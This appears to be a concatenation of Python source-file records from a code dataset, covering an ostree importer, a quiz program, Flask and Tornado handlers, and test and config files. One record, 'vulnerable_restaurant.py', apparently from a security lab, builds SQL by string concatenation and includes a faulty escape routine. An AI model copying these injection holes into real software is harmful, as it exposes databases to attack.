(bucket, key)\n\n\ndef untar_file_from_s3(url: str, tmpdir: str, sha256sum: str):\n filename = \"ostree.tar\"\n filepath = os.path.join(tmpdir, filename)\n\n # Grab file from s3\n logger.info(f\"Downloading object from s3: {url}\")\n s3 = boto3.client(\"s3\")\n bucket, key = parse_s3_url(url)\n s3.download_file(bucket, key, filepath)\n\n # Verify file has correct checksum\n calcuatedsum = get_sha256sum(filepath)\n if sha256sum != calcuatedsum:\n raise Exception(\"Checksums do not match: \" f\"{sha256sum} != {calcuatedsum}\")\n\n # Untar the file into the temporary directory\n with tarfile.open(filepath) as tar:\n tar.extractall(path=tmpdir)\n\n\ndef ostree_pull_local(srcrepo: str, dstrepo: str, branch: str, commit: str):\n # verify the parent commit of the new commit is in the destination repo\n # and also that the current branch in the repo points to it\n branch_exists = ostree_branch_exists(repo=dstrepo, branch=branch)\n parent = ostree_get_parent_commit(repo=srcrepo, commit=commit)\n if branch_exists:\n assert_branch_points_to_commit(repo=dstrepo, branch=branch, commit=parent)\n # pull content\n logger.info(\"Running ostree pull-local to perform import\")\n cmd = [\"ostree\", f\"--repo={dstrepo}\", \"pull-local\", srcrepo, commit]\n runcmd(cmd)\n # update branch\n if branch_exists:\n cmd = [\"ostree\", f\"--repo={dstrepo}\", \"reset\", branch, commit]\n else:\n cmd = [\"ostree\", f\"--repo={dstrepo}\", \"refs\", f\"--create={branch}\", commit]\n logger.info(f\"Updating branch {branch} -> {commit} in {dstrepo}\")\n runcmd(cmd)\n # update summary file\n logger.info(\"Updating summary file\")\n cmd = [\"ostree\", f\"--repo={dstrepo}\", \"summary\", \"-u\"]\n runcmd(cmd)\n\n\ndef ostree_repo_exists(repo: str) -> bool:\n if not os.path.exists(repo):\n return False\n cmd = [\"ostree\", f\"--repo={repo}\", \"refs\"]\n if runcmd(cmd, check=False).returncode != 0:\n logger.debug(f\"OSTree repo does not exist at {repo}\")\n return False\n return True\n\n\ndef ostree_commit_exists(repo: str, commit: str) -> bool:\n cmd = [\"ostree\", f\"--repo={repo}\", \"show\", commit]\n return runcmd(cmd, check=False).returncode == 0\n\n\ndef ostree_branch_exists(repo: str, branch: str) -> bool:\n cmd = [\"ostree\", f\"--repo={repo}\", \"rev-parse\", branch]\n return runcmd(cmd, check=False).returncode == 0\n\n\ndef ostree_get_parent_commit(repo: str, commit: str) -> str:\n cmd = [\"ostree\", f\"--repo={repo}\", \"rev-parse\", f\"{commit}^\"]\n return runcmd(cmd, check=True).stdout.strip().decode()\n\n\ndef assert_branch_points_to_commit(repo: str, branch: str, commit: str):\n cmd = [\"ostree\", f\"--repo={repo}\", \"rev-parse\", branch]\n cp = runcmd(cmd, check=True)\n detected = cp.stdout.strip().decode()\n logger.debug(f\"{branch} points to {detected}\")\n if commit != detected:\n raise Exception(f\"{branch} points to {detected}. Expected {commit}\")\n\n\ndef assert_commit_has_version(repo: str, commit: str, version: str):\n cmd = [\"ostree\", f\"--repo={repo}\", \"show\", commit, \"--print-metadata-key=version\"]\n cp = runcmd(cmd, check=True)\n embeddedversion = cp.stdout.replace(b\"'\", b\"\").strip().decode()\n if version != embeddedversion:\n raise Exception(\n \"Embedded commit version does not match buildid \"\n f\"{version} != {embeddedversion}\"\n )\n\n\n# The code in this file is expected to be run through fedora messaging\n# However, you can run the script directly for testing purposes. The\n# below code allows us to do that and also fake feeding data to the\n# call by updating the json text below.\nif __name__ == \"__main__\":\n sh = logging.StreamHandler()\n sh.setFormatter(\n logging.Formatter(\"%(asctime)s %(levelname)s %(name)s - %(message)s\")\n )\n logger.addHandler(sh)\n\n m = fedora_messaging.api.Message(\n topic=\"org.fedoraproject.prod.coreos.build.request.ostree-import\",\n body=EXAMPLE_MESSAGE_BODY,\n )\n c = Consumer()\n c.__call__(m)\n","sub_path":"coreos-ostree-importer/coreos_ostree_importer.py","file_name":"coreos_ostree_importer.py","file_ext":"py","file_size_in_byte":11212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"195580239","text":"import psycopg2\n\nclass Restaurant():\n\n def __init__(self, connection_string):\n self.conn = psycopg2.connect(connection_string)\n\n def find_ingredient(self, ingredient_name):\n query = \"SELECT * FROM ingredient WHERE ingredient='\" + ingredient_name + \"'\"\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n return cursor.fetchall()\n\n def place_order(self, recipe):\n query = \"INSERT INTO orders(recipe) VALUES('\" + recipe + \"') RETURNING order_number\"\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n self.conn.commit()\n return cursor.fetchone()[0]\n\n def fill_order(self, order_num):\n query = \"UPDATE orders SET filled=now() WHERE order_number='\" + order_num + \"'\"\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n self.conn.commit()\n return cursor.rowcount\n\n def find_course_recipes(self, course):\n query = \"SELECT recipe FROM recipe WHERE experimental = FALSE AND course = '\" + course + \"'\"\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n return cursor.fetchall()\n\n def find_ingredient_better(self, ingredient_name):\n query = \"SELECT ingredient FROM ingredient WHERE ingredient = '%s'\" % (ingredient_name,)\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n return cursor.fetchall()\n\n def find_ingredients_by_cost(self, course):\n # Sanitize user input to properly escape strings\n course = course.replace('\\'', '\\\\\\'')\n query = \"SELECT * FROM ingredient WHERE cost_per_unit > {}\".format(course)\n with self.conn.cursor() as cursor:\n cursor.execute(query)\n return cursor.fetchall()","sub_path":"labs/lab6/vulnerable_restaurant.py","file_name":"vulnerable_restaurant.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"213265897","text":"# nx: threaded\n\nfrom GeneticAlgorithm import *\nfrom utilitiesA2 import *\nfrom lamp import Lamp\n\nimport math\nimport random\nimport numpy as np\n\nfrom shapes.cylinder import Cylinder\nfrom shapes.sphere import Sphere\n\nimport NXOpen\nimport NXOpen.Annotations\nimport NXOpen.Features\nimport NXOpen.GeometricUtilities\nimport NXOpen.Preferences\n\ndef main():\n\n##################################__PARAMETERS__##########################################\n\n #Target point \n target = np.array([100,100,100])\n\n #Define some initial directional parameters\n base_origin = np.array([0,0,0]) #Where lamp base is placed in the 3D-space\n base_vector = np.array([0,0,1]) #Lamp direction\n\n #How many legs should the lamp have?\n number_of_legs = 4\n number_of_joints = number_of_legs + 1\n\n #Number of lampcopies to perform selection on\n number_of_lamps = 8\n\n #Generational limits and parameteres\n max_generations = 30\n success_criteria = 10\n\n #Some general initial values\n initial_leg_length = 30\n leg_diameter = 5\n joint_diameter = leg_diameter * 1 #Multiply by a constant\n base_leg_angle = 45 #Angle of first leg (degrees)\n general_leg_angle = 45 #Angle of all other legs\n base_diameter = 40\n base_height = 10\n hood_diameter = 30.\n hood_thickness = 2\n hood_cutoff_factor = 0.8\n hood_cutoff_length = hood_diameter * hood_cutoff_factor #Where the lamp head opens in reference to its leg-connection\n hood_direction = np.array([-1,0,0]) #The direction of the first hood.\n \n #Optional settings\n allow_joint_turn = True\n allow_head_turn = True\n allow_base_change = False #Fix base in position or not\n allow_mutations = True\n mutation_range = 0.8 #How much percentwise a leg can mutate in one generation\n generations = 30 #False or an int!\n randomize_initial_creation = True #Mutate all parameteres of first lamp \n\n\n\n##################################__PROCEDURE__##########################################\n\n #SETUP INITIAL LAMP\n lamp = Lamp(origin = base_origin, base_vector = base_vector) #Instantiate lamp object\n lamp.generate_initial_base(base_height, base_diameter) #Generate Base\n #Generate legs:\n lamp.generate_initial_legs(number_of_legs, \n leg_diameter, \n joint_diameter,\n initial_leg_length,\n base_leg_angle,\n general_leg_angle,\n randomize_leg_height = False,\n randomize_leg_angle = False,\n randomize_leg_twist = False,\n )\n\n lamp.generate_initial_hood(hood_diameter,\n hood_thickness,\n hood_cutoff_length,\n hood_cutoff_factor,\n hood_direction,\n randomize_initial_vector = True)\n\n #SETUP GENETIC ALGORITHM\n GA = GeneticAlgorithm(allow_joint_turn = allow_joint_turn,\n allow_head_turn = allow_head_turn,\n allow_base_change = allow_base_change,\n allow_mutations = allow_mutations,\n generations = generations,\n mutation_range = mutation_range\n )\n\n #Mutate first lamp\n if randomize_initial_creation == True:\n GA.mutate(lamp, mutation_range_high = 0.8, mutation_range_low = 0.3, mutation_odds = 1)\n\n #Create new lamps\n lamplist = GA.createNewInstances(lamp, number_of_lamps)\n\n #Mutate all new lamps to create different initial lamps with different properties\n for lamp_x in lamplist:\n GA.mutate(lamp_x, mutation_range_high = 0.8, mutation_range_low = 0.3, mutation_odds = 0.1)\n\n #Perform selection and select the best lamp satisfying the requirements\n best_lamp = GA.perform_selection(lamplist, target, max_generations, success_criteria)\n\n\n #Generate target in NX\n target_sphere = Sphere(target, success_criteria, color = \"RED\")\n target_sphere.initForNX()\n \n #Generate final lamp in NX\n best_lamp.generateInNX()\n\nmain()","sub_path":"python/Genetic algorithms/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"246653653","text":"# pylint: disable = redefined-outer-name\n\nimport pathlib\nimport git\nimport pytest\n\nfrom . import utils\nfrom .git_utils import GitClient, GitTestEnvironment\nfrom .perforce_utils import PerforceWorkspace, P4TestEnvironment\n\n\n@pytest.fixture\ndef unicode_dir(tmp_path: pathlib.Path):\n unicode_dir_path = tmp_path / \"Юніко́д з пробелами\"\n unicode_dir_path.mkdir()\n yield unicode_dir_path\n\n\n@pytest.mark.parametrize(\"vcs\", [\"git\", \"p4\"])\n@pytest.mark.parametrize(\"test_type\", [\"main\", \"poll\", \"submit\"])\ndef test_unicode(vcs, test_type, perforce_workspace: PerforceWorkspace, git_client: GitClient, unicode_dir: pathlib.Path):\n env: utils.BaseTestEnvironment\n if vcs == \"git\":\n # change git client root dir to unicode path\n work_dir = unicode_dir / \"client\"\n work_dir.mkdir()\n git_client.repo = git.Repo.clone_from(git_client.server.url, work_dir)\n git_client.root_directory = work_dir\n\n env = GitTestEnvironment(git_client, unicode_dir, test_type=test_type)\n elif vcs == \"p4\":\n # change workspace root dir to unicode path\n root = unicode_dir / \"workspace\"\n root.mkdir()\n client = perforce_workspace.p4.fetch_client(perforce_workspace.client_name)\n client[\"Root\"] = str(root)\n perforce_workspace.root_directory = root\n perforce_workspace.p4.save_client(client)\n perforce_workspace.p4.run_sync(\"-f\", \"//depot/...\")\n\n env = P4TestEnvironment(perforce_workspace, unicode_dir, test_type=test_type)\n else:\n assert False, \"Unsupported vcs type\"\n\n if test_type == \"submit\":\n file_name = utils.randomize_name(\"new_file\") + \".txt\"\n temp_file = env.vcs_client.root_directory / file_name\n temp_file.write_text(\"This is a new file\" + \"\\n\")\n env.settings.Submit.reconcile_list = str(temp_file)\n\n env.run()\n\n\ndef test_unicode_main_local_vcs(unicode_dir: pathlib.Path):\n work_dir = unicode_dir / \"local_sources\"\n work_dir.mkdir()\n (work_dir / \"source_file\").write_text(\"Source file contents\")\n\n env = utils.LocalTestEnvironment(unicode_dir, \"main\")\n env.settings.Vcs.type = \"none\"\n env.settings.LocalMainVcs.source_dir = str(work_dir)\n\n env.run()\n","sub_path":"tests/test_unicode.py","file_name":"test_unicode.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52802817","text":"#Задача: подготовить систему консольного тестирования сотрудника на 10 вопросов\n\n#FIX:\n#Вопросы должны меняться местами от запуска к запуску - fix\n#Один верный ответ - один балл - fix\n#Вариант реализации: показывается сколько правильных и сколько неправильных ответов дано - fix\n#Определение правильного ответа происходит каждый раз при открытии вопрос и ответов к нему. Позволит при перемешивании ответов находить правильный ответ. - fix\n#в конце показывать прошел или нет - fix\n#система перемешивает ответы - fix\n\n#система должна показывать в каких вопросах была ошибка\n#Возможность использовать вопросы с несколькими вариантами ответа. - вариант: сделать тип вопроса? сделать два списка вопросов один с 1 ответом. 1 с несколькими.\n#Возможность заливки вопросов в систему через csv или txt\n#Проверку вводимых ответов - должны быть только цифры от 1 до 9 (больше 9 не будет вариантов ответа) - варианты: перехват ошибки (символ отличный от цифр или пустое ничего\" либо ограничения по количеству вводимых\n#Нужно чтобы система записывала и хранила результаты прошедшего тестирования\n\n\nlist_of_questions = [[{'Предмет информатики — это': ('язык программирования','устройство робота','способы накопления, хранения, обработки, передачи информации')}],\n [{'Тройками из нулей и единиц можно закодировать _ различных символов.':(6, 8, 5, 9)}],\n [{'Капитан спрашивает матроса: «Работает ли маяк?» Матрос отвечает: «То загорается, то погаснет!» Чем является маяк в этой ситуации?':\n ('Получателем информации','источником информации','каналом связи','помехой')}],\n [{'В каком веке появились первые устройства, способные выполнять арифметические действия?':('В XVI в.', 'В XVII в.', 'В XVIII в.', 'В XIX в.')}],\n [{'Механическое устройство, позволяющее складывать числа, изобрел:':('П. Нортон', 'Б. Паскаль', 'Г. Лейбниц', 'Д. Нейман')}],\n [{'Для какой системы счисления были приспособлены первые семикосточковые счеты?':('Для семеричной', 'для двоичной', 'для десятичной', 'для унарной')}],\n [{'Выберите все правильные ответы:':('Солнце - светит','Дождь сухой','Курить - вредно','Медведи летают')}]]\n\n\ndict_of_true_answers = {'Предмет информатики — это': 'способы накопления, хранения, обработки, передачи информации',\n 'Тройками из нулей и единиц можно закодировать _ различных символов.':8,\n 'Капитан спрашивает матроса: «Работает ли маяк?» Матрос отвечает: «То загорается, то погаснет!» Чем является маяк в этой ситуации?':'источником информации',\n 'В каком веке появились первые устройства, способные выполнять арифметические действия?':'В XVII в.',\n 'Механическое устройство, позволяющее складывать числа, изобрел:':'Б. Паскаль',\n 'Для какой системы счисления были приспособлены первые семикосточковые счеты?':'для десятичной', 'Выберите все правильные ответы:':('Солнце - светит','Курить - вредно')}\n\nfrom random import randrange\n\ndef main():\n pass\n\ndef sayHelloAskName():\n print('Добро пожаловать в систему тестирования! Как Вас зовут?')\n name = input()\n return name\n\ndef chooseQuestions(list_of_questions):\n numbers_of_choose_questions = []\n question_list_for_person = []\n kolichestvo_otbiraemih_voprosof = 3\n while len(numbers_of_choose_questions) != kolichestvo_otbiraemih_voprosof:\n random_number = randrange(0, len(list_of_questions))\n if random_number not in numbers_of_choose_questions:\n numbers_of_choose_questions.append(random_number)\n for i in numbers_of_choose_questions:\n question_list_for_person.append(list_of_questions[i])\n return question_list_for_person\n\ndef shuffle_questions(list_of_questions): #ДЕЛАЕМ ПЕРЕМЕШИВАНИЕ СПИСКА ВОПРОСОВ - можно сохранять последнюю комбинацию вопросов и не выдавать такую же (как вариант)\n shuffle_numbers = []\n question_list_for_person = []\n while len(shuffle_numbers) != len(list_of_questions):\n random_number = randrange(0,len(list_of_questions))\n if random_number not in shuffle_numbers:\n shuffle_numbers.append(random_number)\n# print(shuffle_numbers)\n for i in shuffle_numbers:\n question_list_for_person.append(list_of_questions[i])\n print(question_list_for_person)\n return question_list_for_person\n\n\ndef shuffle_answers_in_questions(list_of_questions):\n for i in range(len(list_of_questions)):\n for j in range(len(list_of_questions[i])):\n for key, values in list_of_questions[i][j].items():\n shuffle_numbers = []\n shuffle_answers = []\n values = list(values)\n while len(shuffle_numbers) != len(values):\n random_number = randrange(0,len(values))\n if random_number not in shuffle_numbers:\n shuffle_numbers.append(random_number)\n print(shuffle_numbers)\n for t in shuffle_numbers:\n shuffle_answers.append(values[t])\n values = []\n for k in shuffle_answers:\n values.append(k)\n list_of_questions[i][j][key] = tuple(values)\n return list_of_questions \n\ndef sayYourAnswer():\n pass\n\ndef findTrueAnswer(key_question, variant_otveta, number_vatiant_otveta, number_of_true_answer): #key_question - сам вопрос\n if variant_otveta == dict_of_true_answers[key_question]:\n number_of_true_answer = number_vatiant_otveta \n# print(variant_otveta, dict_of_true_answers[key_question], number_vatiant_otveta, number_of_true_answer)\n return number_of_true_answer\n else:\n return number_of_true_answer\n\ndef findTrueAnswer_ManyAnswers(key_questions, variant_otveta, number_variant_otveta, number_of_true_answer):\n pass\n \n\ndef isYourAnswerTrue(number_of_true_answer, answer):\n global counter_of_true_answers\n if number_of_true_answer == answer:\n print('Это правильный ответ!')\n counter_of_true_answers = countTrueAnswers(counter_of_true_answers)\n else:\n print('Это НЕправильный ответ!')\n\ndef countTrueAnswers(counter_of_true_answers):\n counter_of_true_answers = counter_of_true_answers + 1\n return counter_of_true_answers\n\ndef showResults(counter_of_true_answers):\n print(f'{name}, Вы набрали {counter_of_true_answers} баллов из {len(list_of_questions)}')\n\n# ВОТ ЗДЕСЬ НАЧАЛО ПРОГРАММЫ\n\nlist_of_questions = chooseQuestions(list_of_questions)\nlist_of_questions = shuffle_questions(list_of_questions)\nlist_of_questions = shuffle_answers_in_questions(list_of_questions)\n\n#определение номеров правильных ответов\n#Печать вопросов, снятие ответов от сотрудника\n\nname = sayHelloAskName()\nprint(f'{name}, тебе предстоит ответить на несколько вопросов. В тесте их {len(list_of_questions)}! В каждом вопросе есть только один правильный ответ. Желаем удачи!')\nprint()\n\nnumber_question = 1\ncounter_of_true_answers = 0\n\nfor first_level in list_of_questions:\n for second_level in first_level:\n for key_question,spisok_otvetov in second_level.items():\n print(number_question, '.', key_question, sep = '')\n number_question = number_question + 1\n number_vatiant_otveta = 1\n number_of_true_answer = ''\n for variant_otveta in spisok_otvetov:\n print(number_vatiant_otveta,'.', variant_otveta, sep = '')\n if number_of_true_answer == '':\n number_of_true_answer = findTrueAnswer(key_question, variant_otveta, number_vatiant_otveta, number_of_true_answer)\n number_vatiant_otveta = number_vatiant_otveta + 1\n# print(number_of_true_answer)\n answer = int(input('Введите номер ответа: '))\n# print(answer, number_of_true_answer)\n isYourAnswerTrue(number_of_true_answer, answer)\n print()\nshowResults(counter_of_true_answers)\n\n","sub_path":"Платформа тестирования/old/Платфор��а тестирования v2.py","file_name":"Платформа тестирования v2.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"350354561","text":"while True:\n c = input().split()\n n, x = int(c[0]), int(c[1])\n if n == x == 0:\n break\n count = 0\n for i in range(1, n + 1):\n for j in range(i + 1, n + 1):\n for k in range(j + 1, n + 1):\n if i + j + k == x:\n count += 1\n print(count)\n","sub_path":"task19.py","file_name":"task19.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396116019","text":"# coding: utf-8\n\nimport logging\nimport json\nimport constants\nimport config\nfrom .BaseHandler import BaseHandler\nfrom utils.response_code import RET\nfrom utils.common import require_logined\n\n\nclass AreaInfoHandler(BaseHandler):\n \"\"\"\"\"\"\n def get(self):\n try:\n ret = self.redis.get(\"area_info\")\n except Exception as e:\n logging.error(e)\n ret = None\n if ret:\n data = '{\"errno\": %s, \"errmsg\": \"OK\", \"data\": %s}' % (RET.OK, ret)\n logging.info(\"hit redis cache: area info\")\n return self.write(data)\n # fetch data from MySQL\n try:\n ret = self.db.query(\"select ai_area_id, ai_area_name from ih_area_info\")\n except Exception as e:\n logging.error(e)\n return self.write(dict(errno=RET.DBERR, errmsg=\"get data error\"))\n if not ret:\n return self.write(dict(errno=RET.NODATA, errmsg=\"no area data\"))\n areas = []\n for l in ret:\n area = {\n \"area_id\": l[\"ai_area_id\"],\n \"area_name\": l[\"ai_area_name\"]\n }\n areas.append(area)\n try:\n self.redis.setex(\"area_info\", constants.AREA_INFO_REDIS_EXPIRES_SECONDS, json.dumps(areas))\n except Exception as e:\n logging.error(e)\n self.write(dict(errno=RET.OK, errmsg=\"OK\", data=areas))\n\n\nclass MyHouseHandler(BaseHandler):\n @require_logined\n def get(self):\n user_id = self.session.data.get(\"user_id\")\n try:\n sql = \"select a.hi_house_id,a.hi_title,a.hi_price,a.hi_ctime,b.ai_name,a.hi_index_image_url \" \\\n \"from ih_house_info a inner join ih_area_info b on a.hi_area_id=b.ai_area_id where a.hi_user_id=%s;\"\n ret = self.db.query(sql, user_id)\n except Exception as e:\n logging.error(e)\n return self.write({\"errno\": RET.DBERR, \"errmsg\": \"get data erro\"})\n houses = []\n if ret:\n for l in ret:\n house = {\n \"house_id\": l[\"hi_house_id\"],\n \"title\": l[\"hi_title\"],\n \"price\": l[\"hi_price\"],\n \"ctime\": l[\"hi_ctime\"].strftime(\"%Y-%m-%d\"),\n \"area_name\": l[\"ai_name\"],\n \"img_url\": config.img_url_prefix + l[\"hi_index_image_url\"] if l[\"hi_index_image_url\"] else \"\"\n }\n houses.append(house)\n self.write(dict(errno=RET.OK, errmsg=\"OK\", houses=houses))\n","sub_path":"handlers/House.py","file_name":"House.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"20468918","text":"#!/usr/bin/python3\nfrom flask import Flask\nfrom flask import request\nimport re\napp = Flask(__name__)\n\n\n@app.route('/')\ndef update_hosts():\n \"\"\"\n update the given hosts IP address in /etc/hosts\n \"\"\"\n ip = request.args.get('ip')\n hostname = request.args.get('hostname')\n filename = \"/etc/hosts\"\n\n old_lines = open(filename).read().splitlines()\n\n new_lines = [\n \"{} {}\".format(ip, hostname)\n if re.search(hostname, x, re.IGNORECASE) else x for x in old_lines\n ]\n\n content = \"\\n\".join(new_lines)\n\n with open(filename, \"w\") as text_file:\n text_file.write(content)\n\n return content\n\n\napp.run(host='0.0.0.0', port=5333)\n","sub_path":"linux/scripts/hosts_updater.py","file_name":"hosts_updater.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635025236","text":"from flask import Flask, render_template, request, redirect, session\nfrom random import randint\napp = Flask(__name__)\n\napp.secret_key = 'places' \n\n@app.route('/')\ndef outcomes():\n if 'gold' not in session:\n session['gold'] = 0\n if 'activities' not in session:\n session['activities'] = []\n return render_template('ninja_gold.html')\n@app.route('/process_money', methods=['POST'])\ndef process():\n places = {\n 'farm': randint(-20,5),\n 'casino': randint(-50,50),\n 'cave': randint(0,30),\n 'house': randint(0,5)\n }\n if request.form['place'] in places:\n result = places[request.form['place']]\n session['gold'] = session['gold']+result\n result_dictionary = {\n 'class': \"green\" if result > 0 else \"red\",\n 'activity': \"you went to the {} and {} {} gold!\".format(request.form[\"place\"],\n (\"lost\", \"gained\", [result > 0]), result)}\n \n session['activities'].append(result_dictionary)\n return redirect('/')\n@app.route('/process_money', methods=[\"POST\"])\ndef play_again():\n session.clear()\n\napp.run(debug=True)","sub_path":"python/my_environments/flask/ninjaGold/ninja_gold.py","file_name":"ninja_gold.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"467070478","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport mimetypes\nimport cgi\nimport os.path\n\nclass Worker():\n\n def __init__(self, http_handler, route_params, url_query):\n\n # Keep handler to get more data\n self.http_handler = http_handler\n\n # Request data\n self.request_headers = http_handler.headers\n self.route_params = route_params\n self.url_query = url_query\n\n # e.g: ?key=value_1&key=value_2\n # self.url_query = dict(parse.parse_qs(url_query_str)) # {\"key\":[\"value_1\", \"value_2\"]}\n# self.url_query = dict(parse.parse_qs(url_query_str)) # {\"key\": \"value_2\"}\n\n def get_request_header(self, key, default=None):\n return self.request_headers.get(key, default)\n\n def get_route_param(self, key, default=None):\n return self.route_params.get(key, default)\n\n def get_url_query(self, key, default=None):\n result = self.url_query.get(key)\n if result == None:\n return result\n\n if len(result) == 1:\n return result[0]\n else:\n return result\n\n\n def format_message(self, code, message=None, data=None):\n output = {\n 'status' : code,\n 'message' : message,\n 'data' : data,\n }\n return json.dumps(output)\n\n def debug(self, message):\n self.http_handler.send_debug_message(message + \"\\n\")\n\n\n def addResponseHeader(self, header, value):\n self.http_handler.response_headers[header] = value\n\n\n def responseOK(self, data='', message='OK'):\n self.http_handler.send_message(200, message=message, data=data)\n\n\n def response(self, data):\n pass\n\n def responseError(self, error_code, message='', data=''):\n self.http_handler.send_error(error_code, message, data)\n\n\n def responseFile(self, file_path, block_size=2048):\n mime_type = mimetypes.guess_type(file_path)[0]\n size = os.stat(file_path).st_size\n\n with open(file_path, 'rb') as f:\n self.http_handler.send_headers(200)\n while True:\n data = f.read(block_size)\n if data:\n self.http_handler.send_data(data)\n else:\n break\n f.closed\n\n\n def getRequestBody(self):\n content_length = int(self.request_headers.get('Content-Length', 0))\n if content_length == 0:\n return None\n\n content_type = self.request_headers.get('Content-Type', '')\n if content_type == '':\n return None\n\n ctype, pdict = cgi.parse_header(content_type)\n\n if ctype == 'multipart/form-data':\n result = None\n form = cgi.FieldStorage(fp=self.http_handler.rfile,\n headers=self.http_handler.headers,\n environ={\n 'REQUEST_METHOD':self.http_handler.command,\n 'CONTENT_TYPE':content_type\n })\n # Parse data to dict\n for key in form:\n payload = form[key]\n if type(payload) is list:\n for item in payload:\n if result:\n data = {}\n data['file_name'] = item.filename\n data['name'] = item.name\n data['content'] = item.value\n result.append(data)\n else:\n result= []\n data = {}\n data['file_name'] = item.filename\n data['name'] = item.name\n data['content'] = item.value\n result.append(data)\n else:\n if result:\n data = {}\n data['file_name'] = payload.filename\n data['name'] = payload.name\n data['content'] = payload.value\n result.append(data)\n else:\n result= []\n data = {}\n data['file_name'] = payload.filename\n data['name'] = payload.name\n data['content'] = payload.value\n result.append(data)\n\n return result\n\n # application/x-www-form-urlencoded can be complex ...\n # Just return for developer to parse :)\n return self.http_handler.rfile.read(content_length)\n","sub_path":"server/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"218158147","text":"from Gaudi.Configuration import *\nfrom Configurables import ApplicationMgr, HepMCReader, HepMCDumper, FCCDataSvc\n\nalbersevent = FCCDataSvc(\"EventDataSvc\")\n\nreader = HepMCReader(\"Reader\", Filename=\"example_MyPythia.dat\")\nreader.DataOutputs.hepmc.Path = \"hepmc\"\n\nfrom Configurables import HepMCConverter\nhepmc_converter = HepMCConverter(\"Converter\")\nhepmc_converter.DataInputs.hepmc.Path=\"hepmc\"\nhepmc_converter.DataOutputs.genparticles.Path=\"allGenParticles\"\nhepmc_converter.DataOutputs.genvertices.Path=\"allGenVertices\"\n\nfrom Configurables import GeoSvc\ngeoservice = GeoSvc(\"GeoSvc\", detector='file:DetectorDescription/Detectors/compact/TestTracker.xml',\n OutputLevel = DEBUG)\n\nfrom Configurables import GeantSvc, GdmlDetector\ndet = GdmlDetector(\"GdmlDetector\", gdml = \"Sim/SimG4Common/gdml/example.xml\")\ngeantservice = GeantSvc(\"GeantSvc\", config=\"GeantFullSimConfig\", detector=\"GdmlDetector\")\ngeantservice.addTool(det)\n\nfrom Configurables import GeantFullSimAlg\ngeantsim = GeantFullSimAlg(\"GeantFullSimAlg\")\ngeantsim.DataInputs.genParticles.Path=\"allGenParticles\"\ngeantsim.DataOutputs.trackClusters.Path = \"clusters\"\ngeantsim.DataOutputs.trackHits.Path = \"hits\"\ngeantsim.DataOutputs.trackHitsClusters.Path = \"hitClusterAssociation\"\n\n\nfrom Configurables import AlbersWrite, AlbersOutput\nout = AlbersOutput(\"out\",\n OutputLevel=DEBUG)\nout.outputCommands = [\"keep *\"]\n\nApplicationMgr( TopAlg = [reader, hepmc_converter, geantsim, out],\n EvtSel = 'NONE',\n EvtMax = 1,\n ExtSvc = [albersevent, geoservice, geantservice], # order! geo needed by geant\n OutputLevel=DEBUG\n )\n","sub_path":"config/geant_fullsim_gdml.py","file_name":"geant_fullsim_gdml.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433080945","text":"import requests\nimport csv\nimport os\n#import matplotlib.pyplot as plt\n#import mpld3\nimport progressbar\nfrom Character import Character\nfrom Team import Team\n\ndef getMinCharacterPoints(characterList):\n return min([characterList[x].getPoints() for x in range(0, len(characterList))])\n\ndef addProtoCharacters(fileName, characterList, affil):\n with open(fileName, 'r+', newline = '') as csvFile:\n swdReader = csv.reader(csvFile)\n next(swdReader)\n for row in swdReader:\n tempSides = [row[index] for index in range(6, 12)]\n print(tempSides)\n tempPointsStr = row[1].split('/')\n points = list(map(int, tempPointsStr))\n tempChar = Character(row[3], points[0], True if row[4] == \"TRUE\" else False, int(row[5]))\n tempChar.setSides(tempSides)\n if(affil == row[2]):\n characterList.append(tempChar)\n if (2 == len(points)):\n tempChar = Character('e' + row[3], points[1], True if row[4] == \"TRUE\" else False, int(row[5]))\n tempChar.setSides(tempSides)\n characterList.append(tempChar)\n return characterList\n\ndef getSWDESTINYDBCharacters(allCards, affil):\n characterList = []\n for card in allCards:\n if((card['type_name'] == 'Character') and (card['affiliation_code'] == affil)):\n pointsStr = card['points'].split('/')\n points = list(map(int, pointsStr))\n curChar = Character(card['name'], points[0], card['is_unique'], int(card['health']))\n curChar.setSides(card['sides'])\n characterList.append(curChar)\n if(2 == len(points)):\n curChar = Character('e' + card['name'], points[1], card['is_unique'], int(card['health']))\n curChar.setSides(card['sides'])\n characterList.append(curChar)\n return characterList\n\ndef buildCombinationsHash(characterList):\n minPoints = getMinCharacterPoints(characterList)\n print(\"min points = \" + str(minPoints))\n bar = progressbar.ProgressBar(max_value = len(characterList))\n i = 0\n teamList = set()\n for firstCharacter in characterList:\n i += 1\n bar.update(i)\n for secondCharacter in characterList:\n for thirdCharacter in characterList:\n for fourthCharacter in characterList:\n curTeam = Team(firstCharacter)\n remainingPoints = curTeam.addCharacter(secondCharacter)\n 